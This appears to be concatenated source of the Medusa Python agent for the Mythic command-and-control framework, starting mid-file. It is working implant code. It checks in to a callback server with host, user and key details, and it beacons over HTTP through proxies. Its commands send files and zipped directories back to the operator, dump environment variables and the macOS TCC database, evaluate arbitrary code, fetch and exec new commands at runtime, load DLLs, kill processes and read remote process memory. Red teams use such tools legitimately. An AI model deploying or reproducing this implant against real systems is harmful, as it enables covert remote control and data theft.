'' if hostname and len(hostname) > 0: try: ip = socket.gethostbyname(hostname) except: pass data = { "action": "checkin", "ip": ip, "os": self.getOSVersion(), "user": self.getUsername(), "host": hostname, "domain": socket.getfqdn(), "pid": os.getpid(), "uuid": self.agent_config["PayloadUUID"], "architecture": "x64" if sys.maxsize > 2**32 else "x86", "encryption_key": self.agent_config["enc_key"]["enc_key"], "decryption_key": self.agent_config["enc_key"]["dec_key"] } response_data = self.postMessageAndRetrieveResponse(data) if("status" in response_data): UUID = response_data["id"] self.agent_config["UUID"] = UUID return True else: return False def makeRequest(self, data, method='GET'): hdrs = {} for header in self.agent_config["Headers"]: hdrs[header] = self.agent_config["Headers"][header] if method == 'GET': req = urllib.request.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["GetURI"] + "?" + self.agent_config["GetParam"] + "=" + data.decode(), None, hdrs) else: req = urllib.request.Request(self.agent_config["Server"] + ":" + self.agent_config["Port"] + self.agent_config["PostURI"], data, hdrs) #CERTSKIP if self.agent_config["ProxyHost"] and self.agent_config["ProxyPort"]: tls = "https" if self.agent_config["ProxyHost"][0:5] == "https" else "http" handler = urllib.request.HTTPSHandler if tls else urllib.request.HTTPHandler if self.agent_config["ProxyUser"] and self.agent_config["ProxyPass"]: proxy = urllib.request.ProxyHandler({ "{}".format(tls): '{}://{}:{}@{}:{}'.format(tls, self.agent_config["ProxyUser"], self.agent_config["ProxyPass"], \ self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) auth = urllib.request.HTTPBasicAuthHandler() opener = urllib.request.build_opener(proxy, auth, handler) else: proxy = urllib.request.ProxyHandler({ "{}".format(tls): '{}://{}:{}'.format(tls, self.agent_config["ProxyHost"].replace(tls+"://", ""), self.agent_config["ProxyPort"]) }) opener = 
urllib.request.build_opener(proxy, handler) urllib.request.install_opener(opener) try: with urllib.request.urlopen(req) as response: out = base64.b64decode(response.read()) response.close() return out except: return "" ### CONFIG ### "Server": "callback_host", "Port": "callback_port", "PostURI": "/post_uri", "Headers": HEADER_PLACEHOLDER, "Sleep": callback_interval, "Jitter": callback_jitter, "GetURI": "/get_uri", "GetParam": "query_path_name", ================================================ FILE: Payload_Type/medusa/medusa/agent_code/cat.py ================================================ def cat(self, task_id, path): file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) with open(file_path, 'r') as f: content = f.readlines() return ''.join(content) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/cd.py ================================================ def cd(self, task_id, path): if path == "..": self.current_directory = os.path.dirname(os.path.dirname(self.current_directory + os.sep)) else: self.current_directory = path if path[0] == os.sep \ else os.path.abspath(os.path.join(self.current_directory,path)) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/clipboard.py2 ================================================ def clipboard(self, task_id): from Cocoa import NSPasteboard, NSStringPboardType pboard = NSPasteboard.generalPasteboard() pString = pboard.stringForType_(NSStringPboardType) return str(pString).encode('utf8') ================================================ FILE: Payload_Type/medusa/medusa/agent_code/cp.py ================================================ def cp(self, task_id, source, destination): import shutil source_path = source if source[0] == os.sep \ else os.path.join(self.current_directory,source) dest_path = destination if destination[0] == os.sep \ else os.path.join(self.current_directory,destination) if 
os.path.isdir(source_path):
        # Directory source: recursive copy.
        shutil.copytree(source_path, dest_path)
    else:
        shutil.copy(source_path, dest_path)

================================================
FILE: Payload_Type/medusa/medusa/agent_code/cwd.py
================================================
def cwd(self, task_id):
    # Reports the agent's tracked working directory.
    return self.current_directory

================================================
FILE: Payload_Type/medusa/medusa/agent_code/download.py
================================================
def download(self, task_id, file):
    # Streams a single file back to Mythic in CHUNK_SIZE pieces, honoring
    # the task's "stopped" flag between chunks.
    file_path = file if file[0] == os.sep \
        else os.path.join(self.current_directory,file)
    file_size = os.stat(file_path).st_size
    total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)
    # First message registers the download and obtains a file_id from Mythic.
    data = {
        "action": "post_response",
        "responses": [{
            "task_id": task_id,
            "download": {
                "total_chunks": total_chunks,
                "full_path": file_path,
                "chunk_size": CHUNK_SIZE
            }
        }]
    }
    initial_response = self.postMessageAndRetrieveResponse(data)
    file_id = initial_response["responses"][0]["file_id"]
    chunk_num = 1
    with open(file_path, 'rb') as f:
        while True:
            if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
                return "Job stopped."
            content = f.read(CHUNK_SIZE)
            if not content:
                break # done
            data = {
                "action": "post_response",
                "responses": [
                    {
                        "task_id": task_id,
                        "download": {
                            "chunk_num": chunk_num,
                            "file_id": file_id,
                            "chunk_data": base64.b64encode(content).decode()
                        }
                    }
                ]
            }
            chunk_num+=1
            response = self.postMessageAndRetrieveResponse(data)
    return json.dumps({ "agent_file_id": file_id })

================================================
FILE: Payload_Type/medusa/medusa/agent_code/download_bulk.py
================================================
def download_bulk(self, task_id, path, mode="archive"):
    """
    Bulk download files or a directory from the target machine.

    Args:
        task_id: The task identifier for this operation.
        path: A file path, directory path, or JSON list of file paths (absolute paths).
        mode: "iterative" to send files one by one, or "archive" to bundle into
              an in-memory zip and send as a single file (default: "archive").
    """
    import zipfile
    import io
    # Resolve the list of files to download.
    # archive_base_dir is used in archive mode to compute relative arcnames that
    # preserve the original directory structure inside the zip.
    file_list = []
    archive_base_dir = None
    # Check if path is a list of files/directories
    if isinstance(path, list):
        for p in path:
            abs_p = p if os.path.isabs(p) else os.path.join(self.current_directory, p)
            if os.path.isdir(abs_p):
                # Directories expand to every file underneath them.
                for root, dirs, files in os.walk(abs_p):
                    for fname in files:
                        file_list.append(os.path.join(root, fname))
            else:
                file_list.append(abs_p)
        # Anchor arcnames at the filesystem root so each entry's full path is
        # preserved inside the archive (e.g. "etc/nginx/nginx.conf").
        archive_base_dir = os.sep
    elif isinstance(path, str):
        # Try to parse a JSON list from a string (backward compat)
        stripped = path.strip()
        if stripped.startswith("["):
            try:
                parsed = json.loads(stripped)
                if isinstance(parsed, list):
                    for f in parsed:
                        abs_f = f if os.path.isabs(f) else os.path.join(self.current_directory, f)
                        if os.path.isdir(abs_f):
                            for root, dirs, files in os.walk(abs_f):
                                for fname in files:
                                    file_list.append(os.path.join(root, fname))
                        else:
                            file_list.append(abs_f)
                    archive_base_dir = os.sep
                else:
                    return "Invalid path value: {}".format(path)
            except Exception as e:
                return "Failed to parse path as JSON list: {} - {}".format(path, e)
        else:
            # Normalise to absolute path
            abs_path = path if os.path.isabs(path) \
                else os.path.join(self.current_directory, path)
            if os.path.isdir(abs_path):
                archive_base_dir = os.path.dirname(abs_path)
                for root, dirs, files in os.walk(abs_path):
                    for fname in files:
                        file_list.append(os.path.join(root, fname))
            elif os.path.isfile(abs_path):
                archive_base_dir = os.path.dirname(abs_path)
                file_list = [abs_path]
            else:
                return "Path does not exist or is not accessible: {}".format(abs_path)
    else:
        return "Invalid path argument type: {}".format(type(path))
    if not file_list:
        return "No files found to download."
    # Cache the task reference once to avoid repeated O(n) lookups inside loops
    task_ref = [task for task in self.taskings if task["task_id"] == task_id][0]
    results = []
    if mode == "iterative":
        # Download each file individually using the same chunked approach as download()
        for file_path in file_list:
            if task_ref["stopped"]:
                return "Job stopped."
            if not os.path.isfile(file_path):
                results.append("Skipped (not a file): {}".format(file_path))
                continue
            file_size = os.stat(file_path).st_size
            total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0)
            # Register the download with Mythic and obtain a file_id.
            data = {
                "action": "post_response",
                "responses": [{
                    "task_id": task_id,
                    "download": {
                        "total_chunks": total_chunks,
                        "full_path": file_path,
                        "chunk_size": CHUNK_SIZE
                    }
                }]
            }
            initial_response = self.postMessageAndRetrieveResponse(data)
            file_id = initial_response["responses"][0]["file_id"]
            chunk_num = 1
            with open(file_path, 'rb') as f:
                while True:
                    if task_ref["stopped"]:
                        return "Job stopped."
                    content = f.read(CHUNK_SIZE)
                    if not content:
                        break
                    data = {
                        "action": "post_response",
                        "responses": [{
                            "task_id": task_id,
                            "download": {
                                "chunk_num": chunk_num,
                                "file_id": file_id,
                                "chunk_data": base64.b64encode(content).decode()
                            }
                        }]
                    }
                    chunk_num += 1
                    self.postMessageAndRetrieveResponse(data)
            results.append(json.dumps({"agent_file_id": file_id, "file_path": file_path}))
        return "\n".join(results)
    else:
        # Archive mode: build an in-memory zip and send it as a single file.
        # Directory structure is preserved inside the archive using arcnames
        # computed relative to archive_base_dir.
        zip_buffer = io.BytesIO()
        with zipfile.ZipFile(zip_buffer, mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
            for file_path in file_list:
                if task_ref["stopped"]:
                    return "Job stopped."
                if not os.path.isfile(file_path):
                    continue
                # Preserve the original directory structure: compute the path
                # relative to archive_base_dir so that sub-directories appear as
                # real zip entries (e.g. nginx/conf.d/default.conf) rather than
                # flat names with underscores.
                arcname = os.path.relpath(file_path, archive_base_dir)
                zf.write(file_path, arcname)
        zip_data = zip_buffer.getvalue()
        zip_buffer.close()
        archive_name = "download_bulk_{}.zip".format(task_id)
        total_chunks = int(len(zip_data) / CHUNK_SIZE) + (len(zip_data) % CHUNK_SIZE > 0)
        # Register the archive with Mythic and obtain a file_id.
        data = {
            "action": "post_response",
            "responses": [{
                "task_id": task_id,
                "download": {
                    "total_chunks": total_chunks,
                    "full_path": archive_name,
                    "chunk_size": CHUNK_SIZE
                }
            }]
        }
        initial_response = self.postMessageAndRetrieveResponse(data)
        file_id = initial_response["responses"][0]["file_id"]
        chunk_num = 1
        offset = 0
        while offset < len(zip_data):
            if task_ref["stopped"]:
                return "Job stopped."
            chunk = zip_data[offset:offset + CHUNK_SIZE]
            data = {
                "action": "post_response",
                "responses": [{
                    "task_id": task_id,
                    "download": {
                        "chunk_num": chunk_num,
                        "file_id": file_id,
                        "chunk_data": base64.b64encode(chunk).decode()
                    }
                }]
            }
            chunk_num += 1
            offset += CHUNK_SIZE
            self.postMessageAndRetrieveResponse(data)
        return json.dumps({"agent_file_id": file_id})

================================================
FILE: Payload_Type/medusa/medusa/agent_code/env.py
================================================
def env(self, task_id):
    # Dumps the process environment, one "KEY: value" pair per line.
    return "\n".join(["{}: {}".format(x, os.environ[x]) for x in os.environ])

================================================
FILE: Payload_Type/medusa/medusa/agent_code/eval_code.py
================================================
def eval_code(self, task_id, command):
    # NOTE(review): eval of operator-supplied code is the intended purpose of
    # this command; do not expose it to untrusted input paths.
    return eval(command)

================================================
FILE: Payload_Type/medusa/medusa/agent_code/exit.py
================================================
def exit(self, task_id):
    # Hard process exit: skips interpreter cleanup and any atexit handlers.
    os._exit(0)

================================================
FILE:
def jobkill(self, task_id, target_task_id):
    """Flag a running job so its worker loop exits at its next
    "stopped" check.

    Fix: the original indexed [0] unconditionally and raised IndexError
    when no tasking matched target_task_id; an unknown id is now
    reported instead of crashing the handler.
    """
    matches = [task for task in self.taskings if task["task_id"] == target_task_id]
    if not matches:
        return "No job found with task id: {}".format(target_task_id)
    matches[0]["stopped"] = True


def jobs(self, task_id):
    """Return a JSON list of long-running job threads.

    Skips the main thread, the SOCKS relay threads (names containing
    "a2m"/"m2a"), and the thread running this jobs task itself.
    Thread names are "command:task_id", so each entry is that pair.
    """
    out = [t.name.split(":") for t in threading.enumerate()
           if t.name != "MainThread" and "a2m" not in t.name
           and "m2a" not in t.name and t.name != "jobs:{}".format(task_id)]
    if len(out) > 0:
        return json.dumps({ "jobs": out })
    else:
        return "No long running jobs!"


def kill(self, task_id, process_id):
    """Windows-only: terminate a process by PID via TerminateProcess."""
    import ctypes, ctypes.wintypes
    from ctypes import GetLastError  # NOTE(review): imported but never used
    NTSTATUS = ctypes.wintypes.LONG  # NOTE(review): also unused here
    def _check_bool(result, func, args):
        # ctypes errcheck: raise WinError on a FALSE return
        if not result:
            raise ctypes.WinError(ctypes.get_last_error())
        return args
    Kernel32 = ctypes.WinDLL('kernel32.dll')
    OpenProcess = Kernel32.OpenProcess
    OpenProcess.restype = ctypes.wintypes.HANDLE
    CloseHandle = Kernel32.CloseHandle
    CloseHandle.errcheck = _check_bool
    TerminateProcess = Kernel32.TerminateProcess
    TerminateProcess.restype = ctypes.wintypes.BOOL
    PROCESS_TERMINATE = 0x0001
    PROCESS_QUERY_INFORMATION = 0x0400
    try:
        hProcess = OpenProcess(PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION, False, process_id)
        # NOTE(review): a NULL handle (open failure) is silently ignored;
        # the operator gets no feedback on access-denied / bad PID.
        if hProcess:
            TerminateProcess(hProcess, 1)
            CloseHandle(hProcess)
    except Exception as e:
        return e
"exec_url": str(app.executableURL()) } app_json.append(app_data) except: pass return json.dumps({ "apps": app_json }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/list_dlls.py3 ================================================ def list_dlls(self, task_id, process_id=0): import sys, os.path, ctypes, ctypes.wintypes from ctypes import create_unicode_buffer, GetLastError import re import datetime def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool GetCurrentProcess = Kernel32.GetCurrentProcess GetCurrentProcess.restype = ctypes.wintypes.HANDLE GetCurrentProcess.argtypes = () ReadProcessMemory = Kernel32.ReadProcessMemory ReadProcessMemory.errcheck = _check_bool ReadProcessMemory.argtypes = ( ctypes.wintypes.HANDLE, ctypes.wintypes.LPCVOID, ctypes.wintypes.LPVOID, SIZE_T, ctypes.POINTER(SIZE_T)) # WINAPI Definitions PROCESS_VM_READ = 0x0010 PROCESS_QUERY_INFORMATION = 0x0400 ERROR_INVALID_HANDLE = 0x0006 ERROR_PARTIAL_COPY = 0x012B WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7 MAX_PATH = 260 PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value class RemotePointer(ctypes._Pointer): def __getitem__(self, key): # TODO: slicing size 
def list_dlls(self, task_id, process_id=0):
    # Windows-only: list the DLLs loaded in a process (default: the
    # agent itself) by walking the remote PEB loader data with
    # NtQueryInformationProcess + ReadProcessMemory.  Pure ctypes, no
    # external tooling.
    import sys, os.path, ctypes, ctypes.wintypes
    from ctypes import create_unicode_buffer, GetLastError
    import re        # NOTE(review): unused in this command
    import datetime  # NOTE(review): unused in this command
    def _check_bool(result, func, args):
        # ctypes errcheck: raise WinError on a FALSE/zero return
        if not result:
            raise ctypes.WinError(ctypes.get_last_error())
        return args
    PULONG = ctypes.POINTER(ctypes.wintypes.ULONG)
    ULONG_PTR = ctypes.wintypes.LPVOID
    SIZE_T = ctypes.c_size_t
    NTSTATUS = ctypes.wintypes.LONG
    PVOID = ctypes.wintypes.LPVOID
    PROCESSINFOCLASS = ctypes.wintypes.ULONG
    Kernel32 = ctypes.WinDLL('kernel32.dll')
    OpenProcess = Kernel32.OpenProcess
    OpenProcess.restype = ctypes.wintypes.HANDLE
    CloseHandle = Kernel32.CloseHandle
    CloseHandle.errcheck = _check_bool
    GetCurrentProcess = Kernel32.GetCurrentProcess
    GetCurrentProcess.restype = ctypes.wintypes.HANDLE
    GetCurrentProcess.argtypes = ()
    ReadProcessMemory = Kernel32.ReadProcessMemory
    ReadProcessMemory.errcheck = _check_bool
    ReadProcessMemory.argtypes = (
        ctypes.wintypes.HANDLE,
        ctypes.wintypes.LPCVOID,
        ctypes.wintypes.LPVOID,
        SIZE_T,
        ctypes.POINTER(SIZE_T))
    # WINAPI Definitions
    PROCESS_VM_READ = 0x0010
    PROCESS_QUERY_INFORMATION = 0x0400
    ERROR_INVALID_HANDLE = 0x0006
    ERROR_PARTIAL_COPY = 0x012B
    WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7
    MAX_PATH = 260
    PROCESS_TERMINATE = 0x0001
    PROCESS_QUERY_INFORMATION = 0x0400
    ProcessBasicInformation = 0
    ProcessDebugPort = 7
    ProcessWow64Information = 26
    ProcessImageFileName = 27
    ProcessBreakOnTermination = 29
    STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001)
    STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value
    STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value
    STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value
    class RemotePointer(ctypes._Pointer):
        # Pointer subclass whose indexing dereferences memory in a
        # *remote* process: p[index, handle] or p[index, handle, size]
        # reads via ReadProcessMemory instead of local memory.
        def __getitem__(self, key):
            # TODO: slicing
            size = None
            if not isinstance(key, tuple):
                raise KeyError('must be (index, handle[, size])')
            if len(key) > 2:
                index, handle, size = key
            else:
                index, handle = key
            if isinstance(index, slice):
                raise TypeError('slicing is not supported')
            dtype = self._type_
            offset = ctypes.sizeof(dtype) * index
            address = PVOID.from_buffer(self).value + offset
            simple = issubclass(dtype, ctypes._SimpleCData)
            if simple and size is not None:
                if dtype._type_ == ctypes.wintypes.WCHAR._type_:
                    # size is a byte count; WCHARs are 2 bytes each
                    buf = (ctypes.wintypes.WCHAR * (size // 2))()
                else:
                    buf = (ctypes.c_char * size)()
            else:
                buf = dtype()
            nread = SIZE_T()
            Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(nread))
            if simple:
                return buf.value
            return buf
    _remote_pointer_cache = {}
    def RPOINTER(dtype):
        # Cached factory for RemotePointer types, one per pointee type.
        if dtype in _remote_pointer_cache:
            return _remote_pointer_cache[dtype]
        name = 'RP_%s' % dtype.__name__
        ptype = type(name, (RemotePointer,), {'_type_': dtype})
        _remote_pointer_cache[dtype] = ptype
        return ptype
    RPWSTR = RPOINTER(ctypes.wintypes.WCHAR)
    class UNICODE_STRING(ctypes.Structure):
        _fields_ = (('Length', ctypes.wintypes.USHORT),
                    ('MaximumLength', ctypes.wintypes.USHORT),
                    ('Buffer', RPWSTR))
    class LIST_ENTRY(ctypes.Structure):
        pass
    RPLIST_ENTRY = RPOINTER(LIST_ENTRY)
    LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY),
                           ('Blink', RPLIST_ENTRY))
    class LDR_DATA_TABLE_ENTRY(ctypes.Structure):
        _fields_ = (('Reserved1', PVOID * 2),
                    ('InMemoryOrderLinks', LIST_ENTRY),
                    ('Reserved2', PVOID * 2),
                    ('DllBase', PVOID),
                    ('EntryPoint', PVOID),
                    ('Reserved3', PVOID),
                    ('FullDllName', UNICODE_STRING),
                    ('Reserved4', ctypes.wintypes.BYTE * 8),
                    ('Reserved5', PVOID * 3),
                    ('CheckSum', PVOID),
                    ('TimeDateStamp', ctypes.wintypes.ULONG))
    RPLDR_DATA_TABLE_ENTRY = RPOINTER(LDR_DATA_TABLE_ENTRY)
    class PEB_LDR_DATA(ctypes.Structure):
        _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 8),
                    ('Reserved2', PVOID * 3),
                    ('InMemoryOrderModuleList', LIST_ENTRY))
    RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA)
    class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure):
        _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 16),
                    ('Reserved2', PVOID * 10),
                    ('ImagePathName', UNICODE_STRING),
                    ('CommandLine', UNICODE_STRING))
    RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS)
    PPS_POST_PROCESS_INIT_ROUTINE = PVOID
    class PEB(ctypes.Structure):
        _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 2),
                    ('BeingDebugged', ctypes.wintypes.BYTE),
                    ('Reserved2', ctypes.wintypes.BYTE * 1),
                    ('Reserved3', PVOID * 2),
                    ('Ldr', RPPEB_LDR_DATA),
                    ('ProcessParameters', RPRTL_USER_PROCESS_PARAMETERS),
                    ('Reserved4', ctypes.wintypes.BYTE * 104),
                    ('Reserved5', PVOID * 52),
                    ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE),
                    ('Reserved6', ctypes.wintypes.BYTE * 128),
                    ('Reserved7', PVOID * 1),
                    ('SessionId', ctypes.wintypes.ULONG))
    RPPEB = RPOINTER(PEB)
    class PROCESS_BASIC_INFORMATION(ctypes.Structure):
        _fields_ = (('Reserved1', PVOID),
                    ('PebBaseAddress', RPPEB),
                    ('Reserved2', PVOID * 2),
                    ('UniqueProcessId', ULONG_PTR),
                    ('InheritedFromUniqueProcessId', ULONG_PTR))
    def NtError(status):
        # Turn an NTSTATUS into an OSError with a severity tag.
        import sys
        descr = 'NTSTATUS(%#08x) ' % (status % 2**32,)
        if status & 0xC0000000 == 0xC0000000:
            descr += '[Error]'
        elif status & 0x80000000 == 0x80000000:
            descr += '[Warning]'
        elif status & 0x40000000 == 0x40000000:
            descr += '[Information]'
        else:
            descr += '[Success]'
        if sys.version_info[:2] < (3, 3):
            return WindowsError(status, descr)
        return OSError(None, descr, None, status)
    ntdll = ctypes.WinDLL('ntdll.dll')
    NtQueryInformationProcess = ntdll.NtQueryInformationProcess
    NtQueryInformationProcess.restype = NTSTATUS
    NtQueryInformationProcess.argtypes = (
        ctypes.wintypes.HANDLE,
        PROCESSINFOCLASS,
        PVOID,
        ctypes.wintypes.ULONG,
        PULONG)
    class ProcessInformation(object):
        # Holds a process handle plus the remote PEB/loader data needed
        # to enumerate module names.
        _close_handle = False
        _closed = False
        _module_names = None
        def __init__(self, process_id=None, handle=None):
            if process_id is None and handle is None:
                # no target given: inspect the current process
                handle = GetCurrentProcess()
            elif handle is None:
                handle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, process_id)
                self._close_handle = True
            self._handle = handle
            self._query_info()
            if process_id is not None and not self._ldr:
                return
        def __del__(self, CloseHandle=CloseHandle):
            # CloseHandle bound as a default arg so it is still reachable
            # during interpreter shutdown.
            if self._close_handle and not self._closed:
                try:
                    CloseHandle(self._handle)
                except WindowsError as e:
                    pass
                self._closed = True
        def _query_info(self):
            # Fetch PROCESS_BASIC_INFORMATION, then pull the remote PEB
            # and its loader data into local copies.
            info = PROCESS_BASIC_INFORMATION()
            handle = self._handle
            status = NtQueryInformationProcess(handle, ProcessBasicInformation, ctypes.byref(info), ctypes.sizeof(info), None)
            if status < 0:
                raise NtError(status)
            self._peb = peb = info.PebBaseAddress[0, handle]
            self._ldr = peb.Ldr[0, handle]
        def _modules_iter(self):
            # Walk the InMemoryOrderModuleList doubly-linked list until
            # it wraps back to the list head in PEB_LDR_DATA.
            headaddr = (PVOID.from_buffer(self._peb.Ldr).value +
                        PEB_LDR_DATA.InMemoryOrderModuleList.offset)
            offset = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset
            pentry = self._ldr.InMemoryOrderModuleList.Flink
            while pentry:
                pentry_void = PVOID.from_buffer_copy(pentry)
                if pentry_void.value == headaddr:
                    break
                # links point at InMemoryOrderLinks; rewind to the start
                # of the containing LDR_DATA_TABLE_ENTRY
                pentry_void.value -= offset
                pmod = RPLDR_DATA_TABLE_ENTRY.from_buffer(pentry_void)
                mod = pmod[0, self._handle]
                yield mod
                pentry = LIST_ENTRY.from_buffer(mod, offset).Flink
        def update_module_names(self):
            names = []
            for m in self._modules_iter():
                ustr = m.FullDllName
                name = ustr.Buffer[0, self._handle, ustr.Length]
                names.append(name)
            self._module_names = names
        @property
        def module_names(self):
            # lazily computed, cached after the first walk
            if self._module_names is None:
                self.update_module_names()
            return self._module_names
    try:
        if not process_id:
            pi = ProcessInformation()
        else:
            pi = ProcessInformation(process_id)
        return json.dumps({ "dlls": pi.module_names })
    except Exception as e:
        # NOTE(review): returns the exception object itself, not str(e)
        return e
def list_modules(self, task_id, module_name=""):
    """With no argument, list the names of loaded in-memory module
    repos; with an argument, list the files inside that repo's zip."""
    if module_name:
        if module_name in self.moduleRepo:
            return "\n".join(self.moduleRepo[module_name].namelist())
        else:
            return "{} not found in loaded modules".format(module_name)
    else:
        return "\n".join(self.moduleRepo.keys())


def list_tcc(self,task_id,tcc=True, db="/Library/Application Support/com.apple.TCC/TCC.db"):
    """Dump the macOS TCC database "access" table as JSON.

    BLOB columns are base64-encoded, everything else is stringified.
    The `tcc` parameter is kept for call compatibility but unused (the
    original immediately shadowed it with the row list).

    Fixes: the sqlite connection is now closed explicitly — the
    `with sqlite3.connect(...)` form only wraps a transaction and never
    closes the handle — and the dead `tcc_results` local is removed.
    """
    import sqlite3
    con = sqlite3.connect(db)
    try:
        # table_info rows: (cid, name, type, notnull, dflt_value, pk)
        columns = list(con.execute('PRAGMA table_info("access")'))
        rows = list(con.execute('SELECT * FROM "access"'))
    finally:
        con.close()
    results = []
    for entry in rows:
        line = {}
        for count, ent in enumerate(entry):
            # columns[count][2] is the declared type, [1] the column name
            if columns[count][2] == "BLOB" and ent is not None:
                line[columns[count][1]] = base64.b64encode(ent).decode()
            else:
                line[columns[count][1]] = str(ent)
        results.append(line)
    return json.dumps({ "tcc": results })
def load(self, task_id, file_id, command):
    """Fetch a single-command python source file from Mythic in chunks,
    exec it, and register the resulting function as a new agent command.

    Returns an error string on failure; on success posts the new command
    list back to Mythic itself and returns None.
    """
    total_chunks = 1
    chunk_num = 0
    cmd_code = ""
    while (chunk_num < total_chunks):
        # honor jobkill between chunk fetches
        if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
            return "Job stopped."
        data = { "action": "post_response", "responses": [ {
            "upload": {
                "chunk_size": CHUNK_SIZE,
                "file_id": file_id,
                "chunk_num": chunk_num+1
            },
            "task_id": task_id
        } ]}
        response = self.postMessageAndRetrieveResponse(data)
        chunk = response["responses"][0]
        chunk_num+=1
        # the server reports the real chunk count in the first reply
        total_chunks = chunk["total_chunks"]
        cmd_code += base64.b64decode(chunk["chunk_data"]).decode()
    if cmd_code:
        # Dedent the method body one level and drop the leading 4 chars
        # of indentation on the "def" line so the source can be exec'd
        # at this scope, then attach the function to the agent class.
        # (assumes the shipped source is indented one 4-space level —
        # TODO confirm against the builder's command templates)
        exec(cmd_code.replace("\n    ","\n")[4:])
        setattr(medusa, command, eval(command))
        cmd_list = [{"action": "add", "cmd": command}]
        responses = [{
            "task_id": task_id,
            "user_output": "Loaded command: {}".format(command),
            "commands": cmd_list,
            "completed": True
        }]
        message = { "action": "post_response", "responses": responses }
        response_data = self.postMessageAndRetrieveResponse(message)
    else:
        return "Failed to upload '{}' command".format(command)


def load_dll(self, task_id, dllpath, dllexport):
    """Load a DLL from disk and call one of its exports (Windows only).

    dllpath may be absolute or relative to the agent's CWD; dllexport is
    the name of an exported function invoked with no arguments.

    Fix: the export is now resolved with getattr() instead of eval() on
    an operator-supplied string — same behavior for valid export names,
    but no arbitrary-expression evaluation, and a bad name raises a
    clean AttributeError.
    """
    from ctypes import WinDLL
    dll_file_path = dllpath if dllpath[0] == os.sep \
        else os.path.join(self.current_directory,dllpath)
    loaded_dll = WinDLL(dll_file_path)
    getattr(loaded_dll, dllexport)()
    return "[*] {} Loaded.".format(dllpath)
def load_module(self, task_id, file, module_name):
    # python2 build: download a zip of python source over C2 and make it
    # importable from memory by installing a PEP 302 finder/loader on
    # sys.meta_path that serves files out of the in-memory zip.
    import zipfile, io
    class CFinder(object):
        # Finder + loader backed by self.moduleRepo[repoName] (a ZipFile).
        def __init__(self, repoName, instance):
            self.moduleRepo = instance.moduleRepo
            self.repoName = repoName
            self._source_cache = {}
        def _get_info(self, repoName, fullname):
            # Resolve fullname inside the zip, trying plain module then
            # package layout; returns (submodule, is_package, relpath).
            parts = fullname.split('.')
            submodule = parts[-1]
            modulepath = '/'.join(parts)
            _search_order = [('.py', False), ('/__init__.py', True)]
            for suffix, is_package in _search_order:
                relpath = modulepath + suffix
                try:
                    self.moduleRepo[repoName].getinfo(relpath)
                except KeyError:
                    pass
                else:
                    return submodule, is_package, relpath
            msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
            raise ImportError(msg)
        def _get_source(self, repoName, fullname):
            submodule, is_package, relpath = self._get_info(repoName, fullname)
            fullpath = '%s/%s' % (repoName, relpath)
            if relpath in self._source_cache:
                source = self._source_cache[relpath]
                return submodule, is_package, fullpath, source
            try:
                source = self.moduleRepo[repoName].read(relpath)
                # normalise line endings so compile() accepts the source
                source = source.replace(b'\r\n', b'\n')
                source = source.replace(b'\r', b'\n')
                self._source_cache[relpath] = source
                return submodule, is_package, fullpath, source
            except:
                raise ImportError("Unable to obtain source for module %s" % (fullpath))
        def find_module(self, fullname, path=None):
            # PEP 302: return self if we can serve fullname, else None.
            try:
                submodule, is_package, relpath = self._get_info(self.repoName, fullname)
            except ImportError:
                return None
            else:
                return self
        def load_module(self, fullname):
            import imp
            submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
            code = compile(source, fullpath, 'exec')
            # reuse an existing sys.modules entry if present (reimport)
            mod = sys.modules.setdefault(fullname, imp.new_module(fullname))
            mod.__loader__ = self
            mod.__file__ = fullpath
            mod.__name__ = fullname
            if is_package:
                mod.__path__ = [os.path.dirname(mod.__file__)]
            exec code in mod.__dict__
            return mod
